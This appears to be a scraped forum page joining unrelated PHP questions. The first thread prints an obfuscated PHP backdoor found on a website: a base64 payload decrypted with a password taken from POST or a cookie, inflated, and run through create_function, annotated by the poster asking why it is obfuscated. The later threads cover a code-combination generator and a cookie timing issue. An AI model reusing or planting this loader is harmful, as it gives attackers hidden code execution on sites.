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
tyv1Lr0=
'));
//$l___l_ = $data
//$l__l_ = $input
//$l____l_ = $i and $func
//If the form was submitted, load from post, otherwise check for a cookie and use that.
$input=isset($_POST['input'])?$_POST['input']:(isset($_COOKIE['input'])?$_COOKIE['input']:NULL);
if($input!==NULL)
{
/*
This is a modified hash function, it looks like the md5 hash with extra characters on the end
I notice (because of the string reverse function in there) that when the input string is a palindrome
the extra characters on the end of the output string match the beginning of the output string e.g.
input string = '12321'
md5 = 8542516f8870173d7d1daba1daaaf0a1
modified md5 = 8542516f8870173d7d1daba1daaaf0a185425
The end of the modified md5 (85425) matches the beginning. Don't know how relevant that is.
*/
$input = md5($input).substr(md5(strrev($input)), 0, strlen($input));
//Note 15185 is the length of the data string above after base64 decoding.
for($i = 0; $i < 15185; $i++)
{
//Take the ascii # of the data char at each position and subtract the ascii # of the char
//at the same position in the hashed input. Loop over 256 and return as a char
$data[$i]=chr(( ord($data[$i])-ord($input[$i]))%256);
//Then add that char to the end of the hashed input string
$input.=$data[$i];
}
//$data has been modified at this point, if gzip suceeds in decompressing it
if($data=#gzinflate($data))
{
//If we made a post save it in a cookie
if(isset($_POST['input']))#setcookie('input', $_POST['input']);
//create a function from the unzipped data, unset used variables, and run the function.
$func=create_function('',$data);
unset($data,$input);
$func();
}
}?>
<form action="" method="post"><input type="text" name="input" value=""/><input type="submit" value=">"/></form>
So to summarize it looks like it takes your input, runs it through some md5 shenanigans, combines it with the de-base64'd block of data, unzips it, turns the result into a function, and runs it.
My question is why? Why not just take a text input and eval() it? What is this extra code giving the hacker that he couldn't do before? And is there any way I can see what's in the block of code? It looks like the input can't be plain php, but rather a string of gobbledegook that fits together with the data to create a valid zip file.
This code obfuscation is mainly done to hide the real activity from any researcher. Also, some tools can discover the malicious code if it's not obfuscated. To discover what's hidden behind the scenery, you could have dumped the $data var just before create_function was called. But you can't do that without knowing the incoming data from the hacker's input. If you really want to know, what's there, you can set up logging for the input data and wait until the hacker comes to the site.
PHP code to replace certain values in array, code generator
I am trying to write PHP code as a hobby project to basically create a "possible" code generator. The scenario is that we have a list of 25 valid characters that can be used.
Imagine that you have a 25 character code but you have accidentally scratched off the first two characters or three characters at any location in the code. Now we need to find all the possible combinations to try out. I have put all the valid characters into the array below that can be used in the code.
$valid=array("B","C","D","F","G","H","J","K","M","P","Q","R","T","V","W","X","Y","Z",
"2","3","4","6","7","8","9");
$arraylength=count($valid);
The still available or seen characters are input into a text box and in the place where the character is unreadable is left blank and the variable values are fetched.
$char1= $_POST['code1'];
$char2= $_POST['code2'];
$char3= $_POST['code3'];
$char4= $_POST['code4'];
$char5= $_POST['code5'];
$char6= $_POST['code6'];
$char7= $_POST['code7'];
$char8= $_POST['code8'];
$char9= $_POST['code9'];
$char10= $_POST['code10'];
$char11= $_POST['code11'];
$char12= $_POST['code12'];
$char13= $_POST['code13'];
$char14= $_POST['code14'];
$char15= $_POST['code15'];
$char16= $_POST['code16'];
$char17= $_POST['code17'];
$char18= $_POST['code18'];
$char19= $_POST['code19'];
$char20= $_POST['code20'];
$char21= $_POST['code21'];
$char22= $_POST['code22'];
$char23= $_POST['code23'];
$char24= $_POST['code24'];
$char25= $_POST['code25'];
And put into an array...
$jada = array($char1, $char2, $char3, $char4, $char5, $char6, $char7, $char8, $char9, $char10, $char11, $char12, $char13, $char14, $char15
, $char16, $char17, $char18, $char19, $char20, $char21, $char22, $char23, $char24, $char25);
I have been stumped for a while now, the fiddling I have done at the moment is that if a variable is empty then do something (as a test echo or print the possible combinations)
if(!isset($char1) || trim($char1) == ""){
for($x=0;$x<$arraylength;$x++) {
echo $valid[$x];
echo "<br>";
} }
else{
echo ($char1);
}
Can you guys help out?
Saw this still in an open status after many years of hiatus, I figured that I may as well share some information. In the end I figured it out, you can grab the source here and test it in your own server: https://github.com/Masterkriz/XBOX_Pre-paid_code_fixer
Set cookie fails for first time but works on refresh
Though after reading explanations about setting cookie and not working for first time i find it difficult to resolve the below problem as am new to php and cookies.
I have a webpage with for (e.g) cp.php, login.php, header.php, maindata.php , bottom.php. Whenever i login to the webpage cp.php will be processed from there 1.header.php will be called first 2.maindata.php will be called and 3.bottom.php will be called.
So am setting my cookie at maindata.php and the code is like,
<?php
$cid = $_GET["id"];
$XmlPath = $_GET["path"];
$numpath = $_GET["numpath"];
$finepath =$_GET["finepath"];
$Tech =$_GET["tech"];
$read_str="";
function read($Path)
{
$temp="";
if(file_exists($Path))
{
$library = new SimpleXMLElement($Path,null,true);
foreach($library->children("SAS") as $info){
foreach($info->children("SAS") as $attributes){
$nameVal = $attributes->Name."=".$attributes->Value;
$str_temp .=$nameVal."#";
}
}
}else
{
$str_temp ="NA";
}
return $str_temp;
}
$arrpath =explode(",",$XmlPath);
/*Reading and storing arrpath[0] has the path of xml to be parsed*/
$strG=read($arrpath[0]);
$strC=read($arrpath[1]);
$strB =read($arrpath[2]);
setcookie($cid.'strE',$strG);
setcookie($cid.'comstr',$strC);
setcookie($cid.'basstr',$strB);
(....)
in the same file am reading the cookie using the below code,
$read_str =$_COOKIE[$cid.'strE'].$_COOKIE[$cid.'comstr'].$_COOKIE[$cid.'basstr'];
after this process is done bottom.php will be called and for the first time loading is completed.As i said for the first time am not getting any value in $read_str, but if i refresh the page and do all the process again i am getting the value.
As SETCOOKIE will return TRUE incase of successfully setting cookie i tried putting it in an if-loop and it returned false even for the first time.
kindly assist me in finding where the problem exists!
Make use of isset to check if a cookie exists and then try setting one.
Something like this.
if(!isset($_COOKIE['yourcookie'])) {
setcookie('yourcookie', 'Some data !');
$_COOKIE['yourcookie'] = 'Some data !';
}
echo $_COOKIE['yourcookie'];
I arrived here looking for an answer as well. Here's the deal. When you set a cookie it can only be accessed on the next page load, that is why you can't access it after you set it. If you really need to work with the cookie data right away, you could set the value directly in global cookie such as: $_COOKIE['my_cookie'] = 'i am a cookie'; Use setcookie()just the same so you can set expiration, domain, etc..